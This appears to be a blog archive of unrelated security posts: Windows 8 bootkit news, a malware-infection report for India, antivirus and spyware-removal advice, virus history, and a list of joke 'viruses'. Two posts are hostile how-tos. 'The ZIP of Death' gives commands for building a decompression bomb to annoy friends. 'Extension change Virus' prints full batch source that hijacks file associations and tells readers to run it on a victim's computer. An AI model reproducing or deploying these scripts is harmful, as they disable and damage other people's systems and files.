World's first Win 8 malware 'bootkit' to debut next week

A security researcher said that he has developed malware for Microsoft's forthcoming Windows 8 operating system that is able to load during boot-up when it's run on older PCs.


Peter Kleissner said Stoned Lite – as the latest version of his bootkit is called – doesn't bypass defenses that will be available to people using Windows 8 on newer machines.


Specifically, he said in a series of Twitter messages, it doesn't work against PCs using UEFI (Unified Extensible Firmware Interface), which is being held out as a replacement to Bios ROM firmware. Stoned Lite also doesn't attack a low-level security feature known as Secured Boot, which scans boot drives for invalid signatures prior to starting up.


A previous boot kit – which Kleissner called Stoned – works on Windows 2000 through Windows 7 and is able to load before Windows starts by attaching itself to the master boot record of a targeted PC's hard drive. Stoned Lite is able to do the same thing for Windows Server 2008 and Windows 8, the Vienna-based developer and researcher said. It works by bypassing the Windows User Account Control, and with a footprint of just 14KB, it can easily be unleashed from a USB or CD drive.


Kleissner said he plans to release further details at next week's Malcon conference in India.


Microsoft's announcement in September that it planned to use UEFI was almost immediately met with suspicion from open-source boosters, who claimed the feature could make it impossible to run systems such as Linux and FreeBSD on computers that had adopted the alternative firmware. Microsoft has denied such claims, but many critics still aren't convinced.


Whatever the merits of that argument, the inability of Stoned Lite to penetrate UEFI and Secured Boot are the strongest endorsements to date that the features work as advertised. At least for now. ®


This article was updated to clarify UEFI and Secured Boot.


Source

Report: Malware Infection Rates Rise In India

Microsoft has just released its volume 11 of its Security Intelligence Report or SIR for the first and second quarter of 2011, which has published some alarming findings for India. While there has been a general trend in a decrease in malware infections globally, there appears to be an opposite trend in India.

Newer versions of Windows operating system have been found to be the least affected, possibly due to several vulnerabilities being patched in the newer releases. Similarly, 64-bit versions were found to be consistently less affected than 32-bit versions, possibly because of the more popularity of the latter, thus the reason why cybercriminals target them more.

Of the various threat types, Adware have been dominating, thanks to a new pair of families Win32/OpenCandy andWin32/ShopperReports.Other potentially unwanted software families such as Win32/Keygen which propagates through keygenerators, has also seen an increase in detections.

Worms and Trojan Downloaders & Droppers showed a downward trend, while viruses have been steadily accounting for at just under 5 percent of the total infections. The report notes that a change in behaviour of the AutoRun feature in older Windows could have contributed to the decline in the number of work families as a whole. Spyware infections have been the least bothering of all.

In India, the picture is completely different. Worms (38.3 percent) and Trojans (33.6 percent) infections are found to be the most common, while Adware is somewhere in the middle. Viruses also amount to around 25 per cent of all infections, although spyware infection levels are as low as worldwide. The report also stated that India hosted 11.003 percent of all spambot IP addresses in the second quarter of 2011, which is up from 10.895 from the previous quarter.

How does malware spread?

There are different ways in which malware threat propagation takes place.
* User Interaction Required: In this method, the user is prompted to perform an action for the computer to be compromised. In such cases, users may be unknowingly lured into performing these actions, such as making them believe that their system is infected, redirecting them to a website from where they are asked to download a malware masquerading as an anti-virus software to "cure" their "infected" system.
* AutoRun USB: With USB storage devices fast replacing optical media, the malware spreads through the AutoRun feature of Windows for such drives.
* Autorun Network: In this case, the AutoRun feature is applied to mapped infected network volumes.
* File Infector: The threat spreads by modifying files, usually application or executable files, also known by EXE, SCR, or DLL extensions. Codes in these files are overwritten by the infectious code to help propagate the malware.
* Exploit: Zero-day: Vendor has not released a security update to address the vulnerability at the time of the attack.
* Password Brute Force: Threats of these type, spread by attempting brute force password attacks on available volumes, such as by using the "net use" command.
* Office Macros: Threats also spread by infecting Microsoft Office documents with malicious VBA macros.
* Emails: Spam accounts for the most worldwide email traffic and naturally, malware proliferate.
* Malicious websites: Attackers are known to conduct phishing attacks and distribute malware using malicious websites, which appear completely legitimate, fooling the user into disclosing confidential information or even downloading a malware infected application, which then hijacks the system. Although mostly affecting financial websites, a sizeable phishing interest has been seen in social networking and gaming websites recently.

The report states that more than a third of the malware detections were attributed to malicious software that misused the AutoRun feature. 6 percent were found to be exploits or malicious code attempting to exploit vulnerabilities in the application or operating system. Adobe Reader documents have also been consistently found to be more likely to be vehicles of exploits, while the RTF or Rich Text Format was also found to be a likely candidate.

How to combat these security threats?
* Keep all software on your systems updated. This includes those related to the OS and also third party.
* It is better to use Microsoft Update instead of Windows Update, because the former updates all Microsoft software installed on the system including MS Office suite, while the latter updates only Windows operating system.
* Install an anti-virus software from a trusted vendor and keep it updated. Run periodic scans to ascertain the integrity of your system. A complete internet security suite is preferable because it takes care of almost all threats and is likely to include a competent firewall.
* Be cautious when you click on links in web pages, unless you know for sure that it is safe.
* Never download and open attachments before scanning them with the installed anti-virus.
* Avoid downloading pirated software because it has usually been found to be a vehicle of choice by cybercriminals.
source:techtree

The ZIP of Death

This is a exploit of the compression algorithms to make a small zip that will extract into extream amounts their are more ways and better ones than this one but i will only show how to make a simple 1k = 1m ratio.


1) Make a.txt file


2) Open and type the null character (alt + 255)


3) Press ctrl + a then ctrl + v a couple times to make some null bytes


4) If u have a hexeditor make the hex 00 for about 50 kilobytes.


5) Now make several copies of a.txt and name accordinly


6) Open cmd.exe


7) Type copy /b *.txt b.txt


8) Now every copy is made into a super copy and repeat


9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes.....!


The zip is only 1 mb in size and can really annoy freinds.
For added fun hex edit the zip and you will see a bunch of hex 5555


Just add some more and the file will expand amazingly


Make sure to not open this after


You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz

The World's Worst Spam Producing Countries

Most of the world suffers from the spam problem. However, some countries do little to deter spammers from operating within their borders. These countries become safe havens for the spam operations that plague everyone else, including their own nationals.

Countries with the highest number of spammers operating within their networks are usually those with poor or non-existent spam laws.

Source: http://www.spamhaus.org/statistics/countries.lasso

Extension change Virus

I Have enclosed a simple Extension replaceable batch virus “Ext_change” Source code.

                                                    

1. Open up a Notepad and copy and paste the below code.

 

Title Ext_Change Virus
color a
Rem This Virus file replaces the actual file extensions with the given extensions
@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit

 

2. Save it with the extension .bat, and now you are ready to go….

3. Execute this on Victims computer to create havoc.

 

Its only you who is responsible for what you do with this…. 

we are not responsible for whatever you do with this… and it is only meant for educational means…

How it Works….

 

This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…
It replaces all the text files [.txt] with the extension [.jpeg], and likewise….

An Antivirus takes Inspiration from ant colonies

A team at Wake Forest University have designed and are testing an antivirus program that takes inspiration from the principle that ant colonies run on.

They are of the opinion that this could offer a foolproof system against viruses. The idea is that when an ant comes upon an intruder or a potential predator, the rest of the ants in the colony team up with it and they deal with the unwelcome visitor.

This "swarming philosophy" is what is being tested.

The team at Wake Forest with Errin Fulp (standing) supervising. Errin Fulp, a professor of computer science at Wake Forest University who is working on the project, said that he's training an army of "digital ants" to turn loose into the power grid to take on viruses that enter the system. If this approach works out and is successful, its application could be wide spread with protection connected to SCADA networks (Supervisory Control and Data Acquisition) and computer systems that control everything from sewage to water management systems to mass transit systems and manufacturing systems. The technology has already received 

Antivirus for Mac: It's time

 

For years, Mac owners have laughed at the frantic efforts of their PC neighbors to fend off attack by viruses, Trojans, rootkits, and other malware. Given that PCs are a vastly greater segment of the market, it's cost-effective for the bad guys to concentrate on PC attacks. And yes, it's true that Apple's operating system is tougher to crack than Windows. But the days of Mac complacency may be ending. First, some threats are completely platform-independent. If a phishing email can fool you into entering your credit card data on a fraudulent site, it doesn't matter if you're running Windows, Mac OS, Linux, or DR-DOS. You're hosed.

In addition, some of the bad guys have ventured into the Mac realm, creating Mac-specific attacks like the recent MAC Defender. Delivered via poisoned search engine results, this bogus application claims to protect users, but actually harms them. It opens porn Web pages at intervals and convinces gullible users that they're infected. Naturally the only "cure" is to register MAC Defender.

 In addition, some Macs run Windows as well as Mac OS X, a volatile combination. A Mac running Windows is vulnerable to the innumerable Windows-based attacks already swarmin

g the Web.

We haven't yet observed any true surge in viruses, Trojans, or other active malware targeting the Mac, but it couldn't hurt to be prepared. Many of the major security vendors offer Mac products; some offer combined protection for Mac OS X and Windows running on the Mac. And a few will scan the URLs you visit to help fend off phishing attacks.

You don't even have to pay for Mac antivirus protection. Sophos offers a fully functional home edition of its Mac antivirus for free. If you'd rather go with a different vendor, or if you need features Sophos doesn't offer, consider one of the choices from the chart below.

Funny Virus(s)..

Adam and Eve virus: Takes a couple of bytes out of your Apple.

Airline virus: You're in Dallas, but your data is in Singapore.

Anita Hill virus: Lies dormant for ten years.

Arnold Schwarzenegger virus: Terminates and stays resident. It'll be back.

AT&T virus: Every three minutes it tells you what great service you are getting.

The MCI virus: Every three minutes it reminds you that you're paying too much for the AT&T virus.

Bill Clinton virus: This virus mutates from region to region and we're not exactly sure what it does.

Bill Clinton virus: Promises to give equal time to all processes: 50% to poor, slow processes; 50% to middle-class processes, and 50% to rich ones. This virus protests your computer's involvement in other computer's affairs, even though it has been having one of its own for 12 years.

Congressional Virus: Overdraws your computer.

Congressional Virus: The computer locks up, screen splits erratically with a message appearing on each half blaming the other side for the problem.

Dan Quayle virus: Prevents your system from spawning any child processes without joining into a binary network.

Dan Quayle virus: Simplye addse ane ee toe everye worde youe typee..

David Duke virus: Makes your screen go completely white.

Elvis virus: Your computer gets fat, slow, and lazy and then self destructs, only to resurface at shopping malls and service stations across rural America.

Federal bureaucrat virus: Divides your hard disk into hundreds of little units, each of which do practically nothing, but all of which claim to be the most important part of the computer.

Freudian virus: Your computer becomes obsessed with marrying its own motherboard.

Gallup virus: Sixty percent of the PCs infected will lose 38 percent of their data 14 percent of the time (plus or minus a 3.5 percent margin of error).

George Bush virus: Doesn't do anything, but you can't get rid of it until November.

Government economist virus: Nothing works, but all your diagnostic software says everything is fine.

Jerry Brown virus: Blanks your screen and begins flashing an 800 number.

Madonna virus: If your computer gets this virus, lock up your dog!

Mario Cuomo virus: It would be a great virus, but it refuses to run.

Michael Jackson virus: Hard to identify because it is constantly altering its appearance. This virus won't harm your PC, but it will trash your car.

New World Order virus: probably harmless, but it makes a lot of people really mad just thinking about it.

Nike virus: Just Does It!

Ollie North virus: Turns your printer into a document shredder.

Oprah Winfrey virus: Your 200MB hard drive suddenly shrinks to 80MB, and then slowly expands back to 200MB.

Pat Buchanan virus: Shifts all your output to the extreme right of your screen.

Paul Revere virus: This revolutionary virus does not horse around. It warns you of impending hard disk attack---once if by LAN, twice if by C:.

Paul Tsongas virus: Pops up on December 25 and says, "I'm not Santa Claus."

PBS virus: Your PC stops every few minutes to ask for money.

Politically correct virus: Never calls itself a "virus", but instead refers to itself as an "electronic microorganism".

Richard Nixon virus: Also known as the "Tricky Dick Virus", you can wipe it out but it always makes a comeback.

Right To Life virus: Won't allow you to delete a file, regardless of how old it is. If you attempt to erase a file, it requires you to first see a counselor about possible alternatives.

Ross Perot virus: Activates every component in your system, just before the whole thing quits.

Ted Kennedy virus: Crashes your computer but denies it ever happened.

Ted Turner virus: Colorizes your monochrome monitor.

Terry Randle virus: Prints "Oh no you don't" whenever you choose "Abort" from the "Abort, Retry, Fail" message.

Texas virus: Makes sure that it's bigger than any other file.

UK Parliament virus: Splits the screen into two with a message in each half blaming other side for the state of the system.

Warren Commission virus: Won't allow you to open your files for 75 years.

Which Antivirus Solutions Are Considered Government Grade Protection?

Even though every organization has security cracks, the government, for the most part, takes their security very seriously.

They will do all kinds of test so that they can make sure that no-one is able to get into their system. Of course, not all of those tests will be accurate and some people will be able to get in but, for the most part, you will be safe.

So how can you bring that government style of protection to your computer and network? This is an especially good question when it comes to antivirus protection.

Which antivirus is able to be used on a government system and remain effective? I will take a good look at this question so that I can help you decide which one you should be running.

Which Antivirus Does The Government Use?

For the most part, the government uses the same antivirus as you do.

If you go into any government offices you will see plenty of computers running the likes of Norton and MacAfee but that is for their non-sensitive computers.

For the systems that are very sensitive they may use a custom set of protections as it may be too important to leave that job to normal everyday virus filters.

These are computers that are attacked hundreds maybe even thousands of time a day.

Everyone wants to be able to get into a US government computer.

To be able to fight all of those attacks you would need several servers that are dedicated to stopping these attacks.

This is not something that you would be able to put into your home so you need to look for a solution that the government trust but it is not considered on their highest levels of security.

As I said before, using the normal antivirus software package that you see is a good start.

Norton and companies like it offer different levels of protection.

Instead of purchasing their consumer level brand you can purchase the enterprise version.

This will lead you into having better protection than you normally would. Usually, to get this type of protection, you are going to have to pay for it.

While at the consumer level you can get quality free protection for your computer, when it comes to enterprise level, you are going to have to pay some money.

There is no easy way to get around that.

Do You Need That Much Protection?

Sadly, you might not be as interesting as you think you are.

While it is true that there are some people in the private sector that need to have very well protected computers, not everyone does.

While the data on your computer might be important to you, not everyone is going to try to attack and get that data.

Most hackers aim at low hanging fruit and if your system has a good retail antivirus program on it then that should be enough.

There is no need to get fanatical about the level of security that your computer has.

When I talk about government level security on your system that term can mean many different things.

The government uses several different layers to secure their systems.

You most likely will not need the very top layer but you can make sure that the tool that you use is government approved.

Viruses to Build More Efficient Solar Panels says MIT

Teams of viruses can help build better solar panels by ensuring nanoscale components behave properly, according to a new study. MIT researchers say their virus-assisted breakthrough could improve solar panels’ energy conversion efficiency by one-third. 
Scientists already knew that carbon nanotubes, rolled-up sheets of graphene, could improve the efficiency of photovoltaic cells. Ideally, the nanotubes would gather more electrons that are kicked up from the surface of a PV cell, allowing a greater number of electrons to be used to produce a current. 

But there are complications — carbon nanotubes come in two varieties, functioning either as semiconductors or wires, and they each behave differently. They also tend to clump together, which makes them less effective at gathering up their own electrons.

Graduate students Xiangnan Dang and Hyunjung Yi, MIT professor Angela Belcher and colleagues tested this method with Grätzel cells, but they say the technique could be used to build other virus-augmented solar cells, including quantum-dot and organic solar cells. 

They also learned that the two flavors of nanotubes have different effects on solar cell efficiency — something that had not been demonstrated before. Semiconducting nanotubes can enhance solar cells’ performance, but the continuously conducting wires had the opposite effect. This knowledge could be useful for designing more efficient nanoscale batteries, piezoelectrics or other power-related materials. 

The virus-built structures enhanced the solar cells’ power conversion efficiency to 10.6 percent from 8 percent, according to MIT News. That’s about a one-third improvement, using a viral system that makes up just 0.1 percent of the cells’ weight. 

“A little biology goes a long way,” Belcher said in an MIT News article. The researchers think with further research, they can improve the efficiency even more.

Best 4 Virus attacks & interesting stories behind them!!

Elk Cloner (1982) 
Elk Cloner is regarded as the first virus to hit personal computers worldwide, “Elk Cloner” spread through Apple II floppy disks. The program was authored by Rich Skrenta, a ninth-grade student then, who wanted to play a joke on his schoolmates. The virus was put on a gaming disk, which could be used 49 times. On 50th time, instead of starting the game, it opened a blank screen that read a poem: “Elk Cloner: The program with a personality”. Elk Cloner was though a self-replicating virus like most other viruses, it bore little resemblance to the malicious programmes of today. 

Brain (1986) 
Brain was the first virus to hit computers running Microsoft’s then popular operating system MS-DOS. The virus was written by two Pakistani brothers, Basit Farooq Alvi and his brother Amjad Farooq Alvi and left the phone number of their computer repair shop. A boot-sector virus, Brain infected the boot records of 360K floppy disks. The virus would fill unused space on the floppy disk so that it could not be used. The virus was also known as Lahore, Pakistani and Pakistani Brain. The brothers told TIME magazine they had written it to protect their medical software from piracy and it was supposed to target copyright infringers only. 

CIH (1998)
Chernobyl virus also known as CIH or Spacefiller was first detected in 1998, however, it first triggered in April 1999, 13th the anniversary of the Chernobyl nuclear disaster (which took place in Ukrainian). It was conceived by a University graduate from Taiwan called Chen Ing Hau (CIH). One of the most harmful viruses, it overwrites critical information on infected system drives. The virus was reportedly the first virus known to have the power to damage computer hardware, with virus attempting to erase the hard drive and overwrite the system’s BIOS as well. The virus is also known as “space filler virus,” due to its ability to clandestinely take up file space on computers and prevent anti-virus software from running.

Melissa (1999) 
‘Melissa’ was one of the first viruses to spread over email. When users opened an attachment, the virus sent copies of itself to the first 50 people in the user’s address book, covering the globe within hours. The virus known as Melissa — believed to have been named after a Florida stripper its creator David L. Smith knew, caused more than $80m in damage after it was launched in March 1999. Computers became infected when users received a particular e-mail and opened a Word document attached to it. First found on March 26, 1999, Melissa shut down Internet mail systems at several enterprises across the world after being they got clogged with infected e-mails carrying the worm. The worm was first distributed in the Usenet discussion group alt.sex. The creator of the virus, David Smith, was sentenced to 20 months imprisonment by a United States court.

Major Threats!

There are a lot of PC users that know little about "Spyware", "Mal-ware", "hijackers", "Dialers" & many more. This will help you avoid pop-ups, spammers and all those baddies.

What is spy-ware?

Spy-ware is Internet jargon for Advertising Supported software (Ad-ware). It is a way for shareware authors to make money from a product, other than by selling it to the users. There are several large media companies that offer them to place banner ads in their products in exchange for a portion of the revenue from banner sales. This way, you don't have to pay for the software and the developers are still getting paid. If you find the banners annoying, there is usually an option to remove them, by paying the regular licensing fee.

Known spywares

There are thousands out there, new ones are added to the list everyday. But here are a few:

Alexa, Aureate/Radiate, BargainBuddy, ClickTillUWin, Conducent Timesink, Cydoor, Comet Cursor, eZula/KaZaa Toptext, Flashpoint/Flashtrack, Flyswat, Gator, GoHip, Hotbar, ISTbar, Lions Pride Enterprises/Blazing Logic/Trek Blue, Lop (C2Media), Mattel Brodcast, Morpheus, NewDotNet, Realplayer, Songspy, Xupiter, Web3000, WebHancer, Windows Messenger Service.

How to check if a program has spyware?

The is this Little site that keeps a database of programs that are known to install spyware.

Check Here: http://www.spywareguide.com/product_search.php

If you would like to block pop-ups (IE Pop-ups).

There tons of different types out there, but these are the 2 best, i think.

Try: Google Toolbar (http://toolbar.google.com/) This program is Free

Try: AdMuncher (http://www.admuncher.com) This program is Shareware

If you want to remove the "spyware" try these.

Try: Lavasoft Ad-Aware (http://www.lavasoftusa.com/) This program is Free

Info: Ad-aware is a multi spyware removal utility, that scans your memory, registry and hard drives for known spyware components and lets you remove them. The included backup-manager lets you reinstall a backup, offers and multi language support.

Try: Spybot-S&D (http://www.safer-networking.org/) This program is Free

Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer. Blocks ActiveX downloads, tracking cookies and other threats. Over 10,000 detection files and entries. Provides detailed information about found problems.

Try: BPS Spyware and Adware Remover (http://www.bulletproofsoft.com/spyware-remover.html) This program is Shareware

Info: Adware, spyware, trackware and big brotherware removal utility with multi-language support. It scans your memory, registry and drives for known spyware and lets you remove them. Displays a list and lets you select the items you'd like to remove.

Try: Spy Sweeper v2.2 (http://www.webroot.com/wb/products/spysweeper/index.php) This program is Shareware

Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer.

The best scanner out there, and updated all the time.

Try: HijackThis 1.97.7 (http://www.spywareinfo.com/~merijn/downloads.html) This program is Freeware

Info: HijackThis is a tool, that lists all installed browser add-on, buttons, startup items and allows you to inspect them, and optionally remove selected items.

If you would like to prevent "spyware" being install.

Try: SpywareBlaster 2.6.1 (http://www.wilderssecurity.net/spywareblaster.html) This program is Free

Info: SpywareBlaster doesn`t scan and clean for so-called spyware, but prevents it from being installed in the first place. It achieves this by disabling the CLSIDs of popular spyware ActiveX controls, and also prevents the installation of any of them via a webpage.

Try: SpywareGuard 2.2 (http://www.wilderssecurity.net/spywareguard.html) This program is Free

Info: SpywareGuard provides a real-time protection solution against so-called spyware. It works similar to an anti-virus program, by scanning EXE and CAB files on access and alerting you if known spyware is detected.

Try: XP-AntiSpy (http://www.xp-antispy.org/) This program is Free

Info: XP-AntiSpy is a small utility to quickly disable some built-in update and authentication features in WindowsXP that may rise security or privacy concerns in some people.

Try: SpySites (http://camtech2000.net/Pages/SpySites_Prog...ml#SpySitesFree) This program is Free

Info: SpySites allows you to manage the Internet Explorer Restricted Zone settings and easily add entries from a database of 1500+ sites that are known to use advertising tracking methods or attempt to install third party software.

If you would like more Information about "spyware".

Check these sites.

http://www.spychecker.com/

http://www.spywareguide.com/

http://www.cexx.org/adware.htm

http://www.theinfomaniac.net/infomaniac/co...rsSpyware.shtml

http://www.thiefware.com/links/

http://simplythebest.net/info/spyware.html

Usefull tools...

Try: Stop Windows Messenger Spam 1.10 (http://www.jester2k.pwp.blueyonder.co.uk/j...r2ksoftware.htm) This program is Free

Info: "Stop Windows Messenger Spam" stops this Service from running and halts the spammers ability to send you these messages.

----------------------------------------------------------------------------

All these softwares will help remove and prevent evil spammers and spywares attacking your PC. I myself recommend getting "spyblaster" "s&d spybot" "spy sweeper" & "admuncher" to protect your PC. A weekly scan is also recommended

Free Virus Scan

Scan for spyware, malware and keyloggers in addition to viruses, worms and trojans. New threats and annoyances are created faster than any individual can keep up with.

http://defender.veloz.com// - 15k